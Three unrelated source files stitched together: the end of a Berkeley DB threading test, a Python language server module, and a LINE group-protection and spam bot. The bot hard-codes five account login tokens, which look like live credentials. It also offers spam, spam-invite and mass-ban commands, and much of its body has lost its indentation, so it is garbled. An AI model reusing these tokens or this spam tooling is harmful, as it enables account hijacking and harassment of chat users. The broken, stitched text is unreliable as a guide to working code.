        while self.doLockDetect:
            time.sleep(0.05)
            try:
                aborted = self.env.lock_detect(
                    db.DB_LOCK_RANDOM, db.DB_LOCK_CONFLICT)
                if verbose and aborted:
                    print("deadlock: Aborted %d deadlocked transaction(s)" \
                          % aborted)
            except db.DBError:
                pass
class BTreeThreadedTransactions(ThreadedTransactionsBase):
    """Transactional test on a BTree database (blocking lock waits)."""
    dbtype = db.DB_BTREE
    writers = 2
    readers = 10
    records = 1000
class HashThreadedTransactions(ThreadedTransactionsBase):
    """Transactional test on a Hash database (blocking lock waits)."""
    dbtype = db.DB_HASH
    writers = 2
    readers = 10
    records = 1000
class BTreeThreadedNoWaitTransactions(ThreadedTransactionsBase):
    """Transactional BTree test with DB_TXN_NOWAIT: lock waits fail fast
    instead of blocking, exercising the retry paths."""
    dbtype = db.DB_BTREE
    writers = 2
    readers = 10
    records = 1000
    txnFlag = db.DB_TXN_NOWAIT
class HashThreadedNoWaitTransactions(ThreadedTransactionsBase):
    """Transactional Hash test with DB_TXN_NOWAIT: lock waits fail fast
    instead of blocking, exercising the retry paths."""
    dbtype = db.DB_HASH
    writers = 2
    readers = 10
    records = 1000
    txnFlag = db.DB_TXN_NOWAIT
#----------------------------------------------------------------------
def test_suite():
    """Assemble the bsddb thread-test suite; empty when threads are absent."""
    suite = unittest.TestSuite()
    if not have_threads:
        print("Threads not available, skipping thread tests.")
        return suite
    # Order matches the historical suite: CDB, simple locking, transactions.
    for case in (BTreeConcurrentDataStore,
                 HashConcurrentDataStore,
                 BTreeSimpleThreaded,
                 HashSimpleThreaded,
                 BTreeThreadedTransactions,
                 HashThreadedTransactions,
                 BTreeThreadedNoWaitTransactions,
                 HashThreadedNoWaitTransactions):
        suite.addTest(unittest.makeSuite(case))
    return suite
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
from functools import partial
import logging
import os
import socketserver
import threading
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
# Delay before linting after a change, so rapid keystrokes coalesce.
LINT_DEBOUNCE_S = 0.5  # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10  # 10 s
# Upper bound on concurrent JSON-RPC handler threads in the Endpoint.
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
# Files whose change invalidates the cached settings (see did_change_watched_files).
# NOTE(review): the lowercase trailing "s" in CONFIG_FILEs is historical.
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
    """A wrapper class that is used to construct a custom handler class.

    Subclasses are built dynamically (see start_tcp_lang_server) with
    DELEGATE_CLASS and SHUTDOWN_CALL injected as class attributes.
    """
    delegate = None
    def setup(self):
        """Create the delegate language server bound to this socket's streams."""
        super(_StreamHandlerWrapper, self).setup()
        # pylint: disable=no-member
        self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
    def handle(self):
        """Run the delegate until the connection ends, then shut the server down."""
        try:
            self.delegate.start()
        except OSError as e:
            if os.name == 'nt':
                # Catch and pass on ConnectionResetError when parent process
                # dies
                # pylint: disable=no-member, undefined-variable
                if isinstance(e, WindowsError) and e.winerror == 10054:
                    pass
        # pylint: disable=no-member
        self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
    """Serve *handler_class* over TCP, constructing one server per connection.

    Blocks in serve_forever() until shutdown_server is invoked by a handler.
    """
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')
    def shutdown_server(*args):
        # pylint: disable=unused-argument
        log.debug('Shutting down server')
        # Shutdown call must be done on a thread, to prevent deadlocks
        stop_thread = threading.Thread(target=server.shutdown)
        stop_thread.start()
    # Construct a custom wrapper class around the user's handler_class
    wrapper_class = type(
        handler_class.__name__ + 'Handler',
        (_StreamHandlerWrapper,),
        {'DELEGATE_CLASS': partial(handler_class,
                                   check_parent_process=check_parent_process),
         'SHUTDOWN_CALL': shutdown_server}
    )
    # `server` is captured by the shutdown_server closure above; it is bound
    # here before any connection (and hence any shutdown) can occur.
    server = socketserver.TCPServer((bind_addr, port), wrapper_class)
    server.allow_reuse_address = True
    try:
        log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
        server.serve_forever()
    finally:
        log.info('Shutting down')
        server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
    """Run a language server speaking JSON-RPC over the given IO streams."""
    if not issubclass(handler_class, PythonLanguageServer):
        raise ValueError('Handler class must be an instance of PythonLanguageServer')
    log.info('Starting %s IO language server', handler_class.__name__)
    # Construct the server and block until the input stream is exhausted.
    handler_class(rfile, wfile, check_parent_process).start()
class PythonLanguageServer(MethodDispatcher):
    """ Implementation of the Microsoft VSCode Language Server Protocol
    https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
    """
    # pylint: disable=too-many-public-methods,redefined-builtin
    def __init__(self, rx, tx, check_parent_process=False):
        # Workspace, config and root URI are populated later by m_initialize().
        self.workspace = None
        self.config = None
        self.root_uri = None
        self.watching_thread = None
        self.workspaces = {}
        self.uri_workspace_mapper = {}
        self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
        self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
        self._check_parent_process = check_parent_process
        # Requests are dispatched to m_* methods of self; responses go out on tx.
        self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
        self._dispatchers = []
        self._shutdown = False
    def start(self):
        """Entry point for the server."""
        self._jsonrpc_stream_reader.listen(self._endpoint.consume)
    def __getitem__(self, item):
        """Override getitem to fallback through multiple dispatchers."""
        if self._shutdown and item != 'exit':
            # exit is the only allowed method during shutdown
            log.debug("Ignoring non-exit method during shutdown: %s", item)
            raise KeyError
        try:
            return super(PythonLanguageServer, self).__getitem__(item)
        except KeyError:
            # Fallback through extra dispatchers
            for dispatcher in self._dispatchers:
                try:
                    return dispatcher[item]
                except KeyError:
                    continue
            raise KeyError()
    def m_shutdown(self, **_kwargs):
        """LSP 'shutdown': stop accepting new work but keep the process alive."""
        self._shutdown = True
        return None
    def m_exit(self, **_kwargs):
        """LSP 'exit': tear down the endpoint and both JSON-RPC streams."""
        self._endpoint.shutdown()
        self._jsonrpc_stream_reader.close()
        self._jsonrpc_stream_writer.close()
    def _match_uri_to_workspace(self, uri):
        """Return the workspace owning *uri*, falling back to the root workspace."""
        workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
        return self.workspaces.get(workspace_uri, self.workspace)
    def _hook(self, hook_name, doc_uri=None, **kwargs):
        """Calls hook_name and returns a list of results from all registered handlers"""
        workspace = self._match_uri_to_workspace(doc_uri)
        doc = workspace.get_document(doc_uri) if doc_uri else None
        hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
        return hook_handlers(config=self.config, workspace=workspace, document=doc, **kwargs)
    def capabilities(self):
        """Assemble the ServerCapabilities structure advertised on initialize."""
        server_capabilities = {
            'codeActionProvider': True,
            'codeLensProvider': {
                'resolveProvider': False,  # We may need to make this configurable
            },
            'completionProvider': {
                'resolveProvider': False,  # We know everything ahead of time
                'triggerCharacters': ['.']
            },
            'documentFormattingProvider': True,
            'documentHighlightProvider': True,
            'documentRangeFormattingProvider': True,
            'documentSymbolProvider': True,
            'definitionProvider': True,
            'executeCommandProvider': {
                'commands': flatten(self._hook('pyls_commands'))
            },
            'hoverProvider': True,
            'referencesProvider': True,
            'renameProvider': True,
            'foldingRangeProvider': True,
            'signatureHelpProvider': {
                'triggerCharacters': ['(', ',', '=']
            },
            'textDocumentSync': {
                'change': lsp.TextDocumentSyncKind.INCREMENTAL,
                'save': {
                    'includeText': True,
                },
                'openClose': True,
            },
            'workspace': {
                'workspaceFolders': {
                    'supported': True,
                    'changeNotifications': True
                }
            },
            'experimental': merge(self._hook('pyls_experimental_capabilities'))
        }
        log.info('Server capabilities: %s', server_capabilities)
        return server_capabilities
    def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
        """LSP 'initialize': build config/root workspace; optionally watch the parent PID."""
        log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
        if rootUri is None:
            rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
        self.workspaces.pop(self.root_uri, None)
        self.root_uri = rootUri
        self.config = config.Config(rootUri, initializationOptions or {},
                                    processId, _kwargs.get('capabilities', {}))
        self.workspace = Workspace(rootUri, self._endpoint, self.config)
        self.workspaces[rootUri] = self.workspace
        self._dispatchers = self._hook('pyls_dispatchers')
        self._hook('pyls_initialize')
        if self._check_parent_process and processId is not None and self.watching_thread is None:
            def watch_parent_process(pid):
                # exit when the given pid is not alive
                if not _utils.is_process_alive(pid):
                    log.info("parent process %s is not alive, exiting!", pid)
                    self.m_exit()
                else:
                    # Re-arm the timer; this re-checks every WATCH_INTERVAL seconds.
                    threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
            self.watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
            self.watching_thread.daemon = True
            self.watching_thread.start()
        # Get our capabilities
        return {'capabilities': self.capabilities()}
    def m_initialized(self, **_kwargs):
        """LSP 'initialized' notification: nothing to do."""
        pass
    # --- Feature entry points: thin wrappers around the pyls_* plugin hooks. ---
    def code_actions(self, doc_uri, range, context):
        return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
    def code_lens(self, doc_uri):
        return flatten(self._hook('pyls_code_lens', doc_uri))
    def completions(self, doc_uri, position):
        completions = self._hook('pyls_completions', doc_uri, position=position)
        return {
            'isIncomplete': False,
            'items': flatten(completions)
        }
    def definitions(self, doc_uri, position):
        return flatten(self._hook('pyls_definitions', doc_uri, position=position))
    def document_symbols(self, doc_uri):
        return flatten(self._hook('pyls_document_symbols', doc_uri))
    def execute_command(self, command, arguments):
        return self._hook('pyls_execute_command', command=command, arguments=arguments)
    def format_document(self, doc_uri):
        return self._hook('pyls_format_document', doc_uri)
    def format_range(self, doc_uri, range):
        return self._hook('pyls_format_range', doc_uri, range=range)
    def highlight(self, doc_uri, position):
        return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
    def hover(self, doc_uri, position):
        return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
    @_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
    def lint(self, doc_uri, is_saved):
        """Run all lint plugins for *doc_uri* and publish the diagnostics."""
        # Since we're debounced, the document may no longer be open
        workspace = self._match_uri_to_workspace(doc_uri)
        if doc_uri in workspace.documents:
            workspace.publish_diagnostics(
                doc_uri,
                flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
            )
    def references(self, doc_uri, position, exclude_declaration):
        return flatten(self._hook(
            'pyls_references', doc_uri, position=position,
            exclude_declaration=exclude_declaration
        ))
    def rename(self, doc_uri, position, new_name):
        return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
    def signature_help(self, doc_uri, position):
        return self._hook('pyls_signature_help', doc_uri, position=position)
    def folding(self, doc_uri):
        return self._hook('pyls_folding_range', doc_uri)
    # --- textDocument/* protocol handlers: delegate to the wrappers above. ---
    def m_text_document__did_close(self, textDocument=None, **_kwargs):
        workspace = self._match_uri_to_workspace(textDocument['uri'])
        workspace.rm_document(textDocument['uri'])
    def m_text_document__did_open(self, textDocument=None, **_kwargs):
        workspace = self._match_uri_to_workspace(textDocument['uri'])
        workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
        self._hook('pyls_document_did_open', textDocument['uri'])
        self.lint(textDocument['uri'], is_saved=True)
    def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
        workspace = self._match_uri_to_workspace(textDocument['uri'])
        for change in contentChanges:
            workspace.update_document(
                textDocument['uri'],
                change,
                version=textDocument.get('version')
            )
        self.lint(textDocument['uri'], is_saved=False)
    def m_text_document__did_save(self, textDocument=None, **_kwargs):
        self.lint(textDocument['uri'], is_saved=True)
    def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
        return self.code_actions(textDocument['uri'], range, context)
    def m_text_document__code_lens(self, textDocument=None, **_kwargs):
        return self.code_lens(textDocument['uri'])
    def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
        return self.completions(textDocument['uri'], position)
    def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
        return self.definitions(textDocument['uri'], position)
    def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
        return self.highlight(textDocument['uri'], position)
    def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
        return self.hover(textDocument['uri'], position)
    def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
        return self.document_symbols(textDocument['uri'])
    def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
        # For now we're ignoring formatting options.
        return self.format_document(textDocument['uri'])
    def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
        return self.rename(textDocument['uri'], position, newName)
    def m_text_document__folding_range(self, textDocument=None, **_kwargs):
        return self.folding(textDocument['uri'])
    def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
        # Again, we'll ignore formatting options for now.
        return self.format_range(textDocument['uri'], range)
    def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
        exclude_declaration = not context['includeDeclaration']
        return self.references(textDocument['uri'], position, exclude_declaration)
    def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
        return self.signature_help(textDocument['uri'], position)
    def m_workspace__did_change_configuration(self, settings=None):
        """Apply new client settings and re-lint every open document."""
        self.config.update((settings or {}).get('pyls', {}))
        for workspace_uri in self.workspaces:
            workspace = self.workspaces[workspace_uri]
            workspace.update_config(self.config)
            for doc_uri in workspace.documents:
                self.lint(doc_uri, is_saved=False)
    def m_workspace__did_change_workspace_folders(self, added=None, removed=None, **_kwargs):
        """Track workspace-folder membership and re-home affected documents."""
        # NOTE(review): iterating `removed`/`added` without a None-guard raises
        # TypeError if the client omits either list -- confirm clients always
        # send both (a later upstream fix uses `removed or []`).
        for removed_info in removed:
            removed_uri = removed_info['uri']
            self.workspaces.pop(removed_uri)
        for added_info in added:
            added_uri = added_info['uri']
            self.workspaces[added_uri] = Workspace(added_uri, self._endpoint, self.config)
        # Migrate documents that are on the root workspace and have a better
        # match now
        doc_uris = list(self.workspace._docs.keys())
        for uri in doc_uris:
            doc = self.workspace._docs.pop(uri)
            new_workspace = self._match_uri_to_workspace(uri)
            new_workspace._docs[uri] = doc
    def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
        """Re-lint when external edits touch Python files or lint configs."""
        changed_py_files = set()
        config_changed = False
        for d in (changes or []):
            if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
                changed_py_files.add(d['uri'])
            elif d['uri'].endswith(CONFIG_FILEs):
                config_changed = True
        if config_changed:
            self.config.settings.cache_clear()
        elif not changed_py_files:
            # Only externally changed python files and lint configs may result in changed diagnostics.
            return
        for workspace_uri in self.workspaces:
            workspace = self.workspaces[workspace_uri]
            for doc_uri in workspace.documents:
                # Changes in doc_uri are already handled by m_text_document__did_save
                if doc_uri not in changed_py_files:
                    self.lint(doc_uri, is_saved=False)
    def m_workspace__execute_command(self, command=None, arguments=None):
        return self.execute_command(command, arguments)
def flatten(list_of_lists):
    """Concatenate a sequence of lists into one flat list (order preserved)."""
    flat = []
    for sublist in list_of_lists:
        flat.extend(sublist)
    return flat
def merge(list_of_dicts):
    """Merge dicts left-to-right into one dict; later keys win on conflict."""
    merged = {}
    for mapping in list_of_dicts:
        merged.update(mapping)
    return merged
|
Redbot4.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,os,subprocess
# Log in the primary client (cl) plus four helper accounts (ki/kk/kc/ks).
# SECURITY NOTE(review): auth tokens are hard-coded in source; anyone with
# this file can hijack these accounts. Load them from the environment or a
# config file instead.
cl = LINETCR.LINE()
cl.login(token="EqQNKPSnbQ84wRP9QmU3.rQbq68XMQqTh/UyLzuFmuW.fgs+hV8Nze3kyMIhzeMOqBG+fcV7pQcPFlLT7pC2XQc=")
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token="EqcvWxSWkZLXvNuO60S3.FXP8F/ZJ0UQHfIxYmKf0iW.zVXWYhHzAUu3+pcJ0cImPjX9peYm+h/P5+1r29K3m5Y=")
ki.loginResult()
kk = LINETCR.LINE()
kk.login(token="EqQYiuojsIVJ0uXI8oU7.zwSmQzsHYBrI/F629A4XDW.B70LRj2iJvz8ehHul01XWD0W3CkCo5DlRn0WjRIEJYA=")
kk.loginResult()
kc = LINETCR.LINE()
kc.login(token="EqzFBUjI8B1viqla4da9.gU3VI4Ik4qJzA6Y8uftMEq.DSyFLWGVwKsRelfnRmCv2bcCtm6mIy7jVBpWtuq7Glc=")
kc.loginResult()
ks = LINETCR.LINE()
ks.login(token="EqlCJd8ELUvEBwD97My8.wZxjCuYJwwfJnE+TIiu3Qa.ptsqYuZXwrSfCFDa6dNoVRqbfxSl6EEBrMkgVgKvohA=")
ks.loginResult()
print "login success"
# Python 2 idiom: re-expose setdefaultencoding and force UTF-8 globally.
reload(sys)
sys.setdefaultencoding('utf-8')
# Help text shown for the private-chat command list (decorative box art).
helpMessage ="""╔═════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║╔════════════
║╠[1]Status
║╠[2]Bot?
║╠[3]Respon
║╠[4]Cctv→Ciduk
║╠[5]Tagall
║╠[6]Banlist
║╠[7]Me
║╠[8]Info group
║╠[9]Cancel
║╠[10]Open/Close Qr
║╠[11]Gurl
║╠[12]Gn
║╠[13]Mid @
║╠[14]Nk @
║╠[15]Qr on/off
║╠[16]Cancel on/off
║╠[17]Join on/off
║╠[18]Share on/off
║╠[19]Bot Add @
║╠[20]Bc
║╠[21]Spam
║╠[22]Bot1/2 rename
║╠[23]Allbio:
║╠[24]Copy←→Backup
║╠[25]List group
║╠[26]/invitemeto:
║╠[27]SpamInvite
║╠[28]Ban all
║╠[29]Clear ban
║╠[30]Like
║╠[31]Like me
║╠[32]เข้ามา
║╠[33]Red bye
║╠[34]ลบรัน
║║★And More★
║╚════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
╚═════════════"""
# Help text shown for the in-group command list (decorative box art).
helpgroup =""" ╔═════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║╔════════════
║╠[1]Red on/off
║╠[2]Red1/2 open qr
║╠[3]red say hi
║╠[4]Cctv→Ciduk
║╠[5]Tagall
║╠[6]Banlist
║╠[7]Spam on/off(จำนวน)(ข้อความ)
║╠[8]Info group
║╠[9]Cancel
║╠[10]Open/Close Qr
║╠[11]Gurl
║╠[12]Gn
║╠[13]Mid @
║╠[14]Nk @
║╠[15]Qr on/off
║╠[16]Cancel on/off
║╠[17]Join on/off
║╠[18]Status/Set/Cek
║╠[19]Protect on/off
║╠[20]Cancel on/off
║╠[21]Invite on/off
║╠[21]Qr on/off
║╠[22]Contact on/off
║╠[23]Reade op
║╠[24]Cancel all
║╠[25]Cider on/off
║╠[26]ดึง
╠╠[27]ขอมุข
╠╠[28]เบิร์ดเดย์
╠╠[29]รับแขก
╠╠[30]แคปชั่น
╠╠[31]นับเลข
╠╠[32]สวย
╠╠[33]ทักทาย/มอนิ่ง/หวัดดี
║║★And More★
║╚════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║™By ✰Ŕèďśámúŕi✰
╚═════════════"""
# Client handles: cl is the primary bot, DEF1 holds only the helpers.
KAC=[cl,ki,kk,kc,ks]
DEF1=[ki,kk,kc,ks,]
# Cache each account's mid for fast membership checks in the event loop.
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid]
# admin / owner / whitelist are currently identical hard-coded mid lists.
admin=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
owner=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
whitelist=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
# Mutable feature-flag/state dict toggled at runtime by chat commands.
wait = {
    'contact':False,
    'autoJoin':True,
    # autoCancel: reject invitations to groups smaller than `members`.
    'autoCancel':{"on":True,"members":1},
    'leaveRoom':True,
    'timeline':True,
    # autoAdd: auto-friend anyone who adds the bot, then send `message`.
    'autoAdd':True,
    'message':"""
Thx add me
Idline: http://line.me/ti/p/~Samuri5""",
    "lang":"JP",
    "comment":"Thanks for add me",
    "commentOn":False,
    "commentBlack":{},
    "wblack":False,
    "dblack":False,
    "clock":False,
    "cName":" ",
    "cName2":" ",
    "cName3":" ",
    "cName4":" ",
    "cName5":" ",
    # blacklist: mids to kick/ban; wblacklist/dblacklist arm add/remove modes.
    "blacklist":{},
    "wblacklist":False,
    "dblacklist":False,
    # Group-protection switches consumed by the bot() event handler.
    "Protectgr":True,
    #"Protectjoin":True,
    "Protectcancl":True,
    "protectionOn":True,
    "atjointicket":True
    }
# Per-group read-tracking state used by the read-point ("cctv") feature.
wait2 = {
    'readPoint':{},
    'readMember':{},
    'setTime':{},
    'ROM':{}
    }
setTime = {}
# NOTE(review): the line above is immediately overwritten -- `setTime` is an
# alias of wait2['setTime'], so both names share the same dict.
setTime = wait2['setTime']
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Build a Message addressed to *to* and bump its per-target counter.

    NOTE(review): relies on module globals `profile` and `messageReq` that are
    defined elsewhere in the file, and the constructed `mes` is never actually
    transmitted here -- confirm the send happens elsewhere. Also note the
    mutable default `contentMetadata={}` is shared across calls.
    """
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "คุณไม่ได้รับอนุญาตให้เปิดลิ้งค์")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "คุณไม่ได้รับอนุญาตให้เปิดลิ้งค์")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "โปรดอย่ายกเชิญ?\nขณะที่เปิดระบบป้องกันการยกเชิญอยู่😛")
#------Cancel Invite User finish------#
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------Joined User Kick start------#
#if op.type == 17: #awal 17 ubah 13
#if wait["Protectjoin"] == True:
#if op.param2 not in admin and Bots : # Awalnya admin doang
#random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
        if op.type == 19: # a member was kicked from the group
            # Anti-kick guard: kicks performed by our own bots, admins or
            # whitelisted users are ignored; anyone else gets kicked back and
            # added to the blacklist.
            if op.param2 in Bots:
                pass
            elif op.param2 in admin:
                pass
            elif op.param2 in whitelist:
                pass
            else:
                try:
                    cl.kickoutFromGroup(op.param1,[op.param2])
                    wait["blacklist"][op.param2] = True
                    #f=codecs.open('st2__b.json','w','utf-8')
                    #json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
                except:
                    # main client failed (presumably no rights / not in the
                    # group -- TODO confirm): retry with a random backup client
                    random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
                    wait["blacklist"][op.param2] = True
                    #f=codecs.open('st2__b.json','w','utf-8')
                    #json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.type == 19: #bot Ke Kick
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
if op.param3 in mid:
if op.param2 not in Bots or admin:
try:
G = ki.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
kk.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
